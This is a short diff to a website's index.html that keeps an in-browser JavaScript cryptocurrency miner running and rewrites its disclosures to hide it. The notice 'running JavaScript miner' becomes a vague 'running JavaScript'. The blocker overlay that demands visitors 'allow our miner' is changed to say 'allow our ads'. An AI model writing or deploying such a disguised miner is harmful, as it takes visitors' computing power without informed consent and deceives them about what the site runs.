--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
         throttle: 0, c: 'w'
     });
     _client.start();
-    _client.addMiningNotification("Top", "Nurutomo is running JavaScript miner from web in this site", "#cccccc", 40, "#3d3d3d");
+    _client.addMiningNotification("Top", "system is running JavaScript from web in this site", "#cccccc", 40, "#3d3d3d");
 </script>
 <script>
     setTimeout(function(){
@@ -14,7 +14,7 @@
         {
             var messageDiv = document.createElement("div");
             messageDiv.setAttribute("style","width: 50%; background-color: white; padding: 15px; display: inline-block; vertical-align: middle;");
-            messageDiv.appendChild(document.createTextNode("Please allow our miner on your blocker software to continue browsing our site. Reload the page after that."));
+            messageDiv.appendChild(document.createTextNode("Please allow our ads on your blocker software to continue browsing our site. Reload the page after that."));
             var mainDiv = document.createElement("div");
             mainDiv.setAttribute("style","position: absolute; top: 0px; right: 0px; width: 100%; height: 100%; display: flex; background-color: #4c4c4c;  align-items: center; justify-content: center");
             mainDiv.appendChild(messageDiv);
